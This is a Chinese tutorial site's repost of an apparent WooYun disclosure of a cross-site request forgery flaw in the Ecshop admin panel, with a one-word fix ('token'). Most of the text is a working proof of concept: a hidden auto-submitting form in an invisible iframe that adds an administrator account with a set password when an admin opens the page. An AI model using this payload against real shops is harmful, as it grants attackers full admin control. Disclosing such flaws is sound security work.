来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] 后台没有token有木有!!!所以,做好一个自动提交表单,且载入与一个隐藏的框架中,给管理员访问,管理员就中招了有木有!!!POC:代表乌云消灭你 Ecshop Csrf获取管理员权限测试...
|
后台没有token有木有!!!
所以,做好一个自动提交表单,且载入与一个隐藏的框架中,给管理员访问,管理员就中招了有木有!!!
POC:
代表乌云消灭你 Ecshop Csrf获取管理员权限测试 By VIP
<form method="POST" action="http://127.0.0.1/ecshop/admin/privilege.php?act=add" target="hidden_frame"> <input type="hidden" name="user_name" value="wooyun" /> <input type="hidden" name="email" value="root@wooyun.org" /> <input type="hidden" name="password" value="wooyuntest123" /> <input type="hidden" name="pwd_confirm" value="wooyuntest123" /> <input type="hidden" name="act" value="insert" /> </form> <iframe style="DISPLAY: none" id=hidden_frame name=hidden_frame></iframe> <script>document.forms[0].submit();</script>
给管理员访问这个页面后,页面没有变化,但是后台其实已经增加了一个用户名wooyun 邮箱root@wooyun.org 密码wooyuntest123的管理员 有木有!!!
  修复方案:
token呀 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
